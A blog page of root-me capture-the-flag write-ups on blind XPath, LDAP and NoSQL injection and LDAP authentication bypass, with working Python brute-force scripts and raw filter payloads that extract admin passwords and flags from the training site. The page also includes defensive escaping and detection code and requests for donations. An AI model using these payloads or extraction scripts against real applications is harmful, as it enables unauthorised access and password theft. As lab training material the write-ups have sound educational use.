Protected: MeepwnCTF2018 – Map lờ



[root-me] XPath injection – blind

Statement

You have to retrieve the administrator password.


http://challenge01.root-me.org/web-serveur/ch24/?action=user&userid=1'

=> XPath error: //user[userid=1\'] : single quotes and many other special characters are escaped

It means I can't use a string with quotes directly to find the password value, so I will compare a substring with a substring instead; but first we have to find the password length.

http://challenge01.root-me.org/web-serveur/ch24/?action=user&userid=111111 ] | //user[1][userid=1 and string-length(/user[2]/password)>1 ]| //user[userid=2
=> keep searching (increasing the length in the comparison) until it returns Steve; when the condition is false, it returns John

The most important thing is that we cannot use quote characters to send a string into the query, so we use strings that are already in the data: the username, email and account type columns of the members table.

Here is an example: I cut one character from the username and compare it to one character cut from the password.

http://challenge01.root-me.org/web-serveur/ch24/?action=user&userid=111111 ] | //user[1][userid=1 and substring(//user[2]/password,2,1)=substring(//user[1]/username,3,1) ]| //user[userid=111111

If the comparison is true, it returns John's profile; otherwise it returns ERROR.

Here is my code; you need to change username to email and account type to brute-force more characters, and so on…


# Python 3 version of the script (the original was written for Python 2)
import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry


def requests_retry_session(
    retries=10,
    backoff_factor=0.3,
    status_forcelist=(500, 502, 504),
    session=None,
):
    # Session that retries on connection/read errors and transient 5xx responses
    session = session or requests.Session()
    retry = Retry(
        total=retries,
        read=retries,
        connect=retries,
        backoff_factor=backoff_factor,
        status_forcelist=status_forcelist,
    )
    adapter = HTTPAdapter(max_retries=retry)
    session.mount('http://', adapter)
    session.mount('https://', adapter)
    return session


# Searching for letters in the password: compare password char u with
# char i of each user's username (no quotes needed, see above)
url = "http://challenge01.root-me.org/web-serveur/ch24/?action=user&userid=111111] | //user[1][userid=1 and substring(//user[2]/password,"
payload0 = ",1)=substring(//user["
payload1 = "]/username,"
payload2 = ",1) ] | //user[userid=111111"
for u in range(1, 14):
    for user in range(1, 6):
        for i in range(1, 18):
            # print(url + str(u) + payload0 + str(user) + payload1 + str(i) + payload2)  # turn it on if you want to track your url
            r = requests_retry_session().get(url + str(u) + payload0 + str(user) + payload1 + str(i) + payload2)
            if "Steve" in r.text:
                print("pass char " + str(u) + " equal to username: " + str(user) + " pos: " + str(i))
                break

# Searching for digits in the password: compare password char u with 0-9
for u in range(1, 14):
    for i in range(0, 10):
        # print(url + str(u) + ",1)=" + str(i) + "] | //user[userid=111111")
        r = requests_retry_session().get(url + str(u) + ",1)=" + str(i) + "] | //user[userid=111111")
        if "Steve" in r.text:
            print("pass char " + str(u) + " equal to number: " + str(i))
            break

and you will get output listing, for each password character, the matching username position or digit.

now, it is your turn :))
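From the defender's side, the root cause above is a userid that is pasted into the XPath expression as-is. The following is an added example (not the writeup's code) of the two checks a server should apply: accept only a plain integer before building the expression, and flag requests whose userid carries XPath tokens for log review; the URLs it checks are the ones from this post.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Tokens that only show up when the userid value is rewriting the XPath
# expression itself (the payloads above use ']', '|', substring() and
# string-length()); a plain numeric id never contains any of them.
XPATH_MARKERS = ("'", '"', "]", "|", "//", "substring(", "string-length(")


def safe_user_xpath(userid):
    """Build the lookup expression only for a plain integer id.

    Returns None for anything else, so the value can never close the
    predicate or append a second path with '|'.
    """
    if not re.fullmatch(r"[0-9]{1,9}", userid):
        return None
    return "//user[userid=%d]" % int(userid)


def suspicious_userid_tokens(url):
    """Return the XPath markers found in the userid parameter of a request URL.

    Meant for log review: an empty list means the parameter looks like an id.
    """
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    found = set()
    for value in query.get("userid", []):
        decoded = unquote(value)
        found.update(m for m in XPATH_MARKERS if m in decoded)
    return sorted(found)


if __name__ == "__main__":
    # Constructed sample: a normal request and the blind-injection request from the writeup
    normal = "http://challenge01.root-me.org/web-serveur/ch24/?action=user&userid=1"
    probe = ("http://challenge01.root-me.org/web-serveur/ch24/?action=user&userid=111111 ] | "
             "//user[1][userid=1 and substring(//user[2]/password,2,1)=substring(//user[1]/username,3,1) ]"
             "| //user[userid=111111")
    for u in (normal, probe):
        uid = parse_qs(urlsplit(u).query)["userid"][0]
        print(safe_user_xpath(uid), suspicious_userid_tokens(u))
```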

Hello guys, my next semester is coming and I really need your help for my tuition fee
just 1 dollar and you will help me a lot, thank you very much!
https://paypal.me/taind

[root-me]LDAP injection – blind

Hello guys, next semester is coming and I still can’t save enough money for my tuition fee, just 1 dollar and you will help me a lot, thank you!
If you have any questions about this challenge, please do not hesitate to ask me
https://paypal.me/taind
:))

Statement

Retrieve administrator’s password.


This challenge is very easy; I do not have much to say because everything you need for it is in the included document. Please read section 5.3.2 carefully and try again before scrolling down!


The point is that you need to know which variable receives the value of the search parameter,

and I found that it was EMAIL


and I figured out that there is a password variable


and from section 5.3.2, I wrote this script


# Python 3 version of the script (the original was written for Python 2)
import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
import string


def requests_retry_session(
    retries=10,
    backoff_factor=0.3,
    status_forcelist=(500, 502, 504),
    session=None,
):
    # Session that retries on connection/read errors and transient 5xx responses
    session = session or requests.Session()
    retry = Retry(
        total=retries,
        read=retries,
        connect=retries,
        backoff_factor=backoff_factor,
        status_forcelist=status_forcelist,
    )
    adapter = HTTPAdapter(max_retries=retry)
    session.mount('http://', adapter)
    session.mount('https://', adapter)
    return session


# Brute-force the password one character at a time: the search only matches
# the admin entry when (password=<known prefix><guess>*) is true
char = string.ascii_letters + string.digits + "_@"
url = "http://challenge01.root-me.org/web-serveur/ch26/?action=dir&search=admin@ch26*)(password="
flag = ""
for i in range(1, 33):
    for x in char:
        print(url + flag + x + "*))%00")
        r = requests_retry_session().get(url + flag + x + "*))%00")
        if "admin" in r.text:
            flag += x
            break
print(flag)

Good luck, have fun!


[root-me] LDAP injection – authentication

Statement

Bypass authentication mechanism.


input: username=*)&password=111

ERROR : Invalid LDAP syntax : (&(uid=*))(userPassword=111))

(now we know the query structure)

input: username=*)(%26&password=111

which will become (&(uid=*)(&)(userPassword=111))

but the output is: unknown identifiers … which means my input has no syntax error, but I need to add more things …

Please read section 4.2.1 of their document!!!

(|(type=Rsc1)(type=Rsc2))

If the attacker enters Rsc1=printer)(uid=*), the following query is sent to the server:
(|(type=printer)(uid=*))(type=scanner))
The LDAP server responds with all the printer and user objects.
So this is my payload:

input: username=*)(|(userPassword=*&password=1)

which will become (&(uid=*)(|(userPassword=*)(userPassword=1)))
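Both LDAP posts (the blind search on ch26 and this authentication bypass) work because user input reaches the filter unescaped. Added example, not code from the writeups or from root-me: RFC 4515 escaping applied to the same filter shapes, with the two payloads above rendered harmless; the attribute name mail used for the directory search is an assumption standing in for the EMAIL field found in the blind post.

```python
# RFC 4515 filter escaping: the characters that can change the structure of a
# search filter are replaced with a backslash and their two-digit hex code.
_LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",  # the %00 truncation used in the blind challenge
}


def ldap_filter_escape(value):
    """Escape one assertion value so it is matched literally inside a filter."""
    return "".join(_LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def login_filter(username, password):
    """Same shape as the authentication challenge's (&(uid=...)(userPassword=...)),
    but with both values escaped. Comparing userPassword in a filter is itself
    weak: a real login should bind as the user's DN with the password instead."""
    return "(&(uid=%s)(userPassword=%s))" % (
        ldap_filter_escape(username), ldap_filter_escape(password))


def directory_search_filter(search):
    """Escaped version of the ch26 directory search; 'mail' is an assumed
    attribute name standing in for the EMAIL field the writeup found."""
    return "(mail=%s)" % ldap_filter_escape(search)


def has_filter_metacharacters(value):
    """Detection helper for input or log review: True if a submitted value
    contains anything that would have needed escaping."""
    return any(ch in _LDAP_FILTER_ESCAPES for ch in value)


if __name__ == "__main__":
    # Constructed sample: the two payloads from the writeups above
    print(login_filter("*)(|(userPassword=*", "1)"))
    print(directory_search_filter("admin@ch26*)(password=a*))\x00"))
    print(has_filter_metacharacters("alice"), has_filter_metacharacters("*)(|"))
```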


[root-me]NoSQL injection – blind

Statement

This is a little web application to test challenge flags. Retrieve the flag for the challenge 'nosqlblind'.


I wasted my time on this challenge … because of the "#" character … I didn't think it was the comment character in MongoDB until…

please read this document, it will help you a lot

https://docs.mongodb.com/manual/reference/operator/query/regex/

yeah, regex is love regex is life …

My thanks to Peter, whose post helped me fix this problem (I don't know him, LOL)

Max retries exceeded with url ….. (Caused by NewConnectionError('<requests.packages.urllib3.connec)'

https://www.peterbe.com/plog/best-practice-with-retries-with-requests

Please read my code carefully (and Peter's post), do not copy and paste


# Python 3 version of the script (the original was written for Python 2)
import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
import string


def requests_retry_session(
    retries=10,
    backoff_factor=0.3,
    status_forcelist=(500, 502, 504),
    session=None,
):
    # Session that retries on connection/read errors and transient 5xx responses
    session = session or requests.Session()
    retry = Retry(
        total=retries,
        read=retries,
        connect=retries,
        backoff_factor=backoff_factor,
        status_forcelist=status_forcelist,
    )
    adapter = HTTPAdapter(max_retries=retry)
    session.mount('http://', adapter)
    session.mount('https://', adapter)
    return session


url = "http://challenge01.root-me.org/web-serveur/ch48/index.php?chall_name=nosqlblind&flag[$regex]="
char = string.ascii_letters + string.digits + "_!@$&"  # '#' is left out: it is a comment character
flag = ""
for x in range(1, 33):
    for i in char:
        print(url + "^" + flag + i)  # ^ means "starts with"
        r = requests_retry_session().get(url + "^" + flag + i)
        if "Yeah" in r.text:
            flag = flag + i
            break
print(flag)
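The injection here exists because PHP turns flag[$regex]=... into an array, and that array is handed to MongoDB as a query operator. Added example, not the challenge's code: a Python model of the same request handling that refuses non-scalar parameters before they can become operators; the one-level PHP-style parser is a deliberate simplification of what $_GET does.

```python
import re
from urllib.parse import parse_qsl

_BRACKET_KEY = re.compile(r"^([^\[\]]+)\[([^\[\]]*)\]$")


def php_style_params(query_string):
    """Decode a query string the way PHP fills $_GET (one nesting level only,
    enough for this challenge): 'flag[$regex]=^a' -> {'flag': {'$regex': '^a'}}."""
    params = {}
    for key, value in parse_qsl(query_string, keep_blank_values=True):
        match = _BRACKET_KEY.match(key)
        if match:
            params.setdefault(match.group(1), {})[match.group(2)] = value
        else:
            params[key] = value
    return params


class OperatorInjection(ValueError):
    """Raised when a parameter would reach the query as an operator document."""


def scalar_only(value, name):
    """Accept a plain string; reject arrays/objects, which is where $regex,
    $ne and the other query operators come from."""
    if isinstance(value, dict):
        keys = [k for k in value if k.startswith("$")] or list(value)
        raise OperatorInjection("%s is not a scalar (keys: %s)" % (name, keys))
    return str(value)


def build_flag_query(query_string):
    """Return the exact-match filter {'chall_name': ..., 'flag': ...} for the
    flag check, or raise OperatorInjection. Both values are plain strings, so
    the database can only compare them for equality."""
    params = php_style_params(query_string)
    return {
        "chall_name": scalar_only(params.get("chall_name", ""), "chall_name"),
        "flag": scalar_only(params.get("flag", ""), "flag"),
    }


def query_is_safe(query_string):
    """Convenience wrapper for log review: False if the request would have
    injected an operator."""
    try:
        build_flag_query(query_string)
    except OperatorInjection:
        return False
    return True
```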

Hello guys…Next semester is coming I still can’t save enough money for my college tuition fee @@! Just 1 dollar and you will help me a lot https://www.paypal.me/taind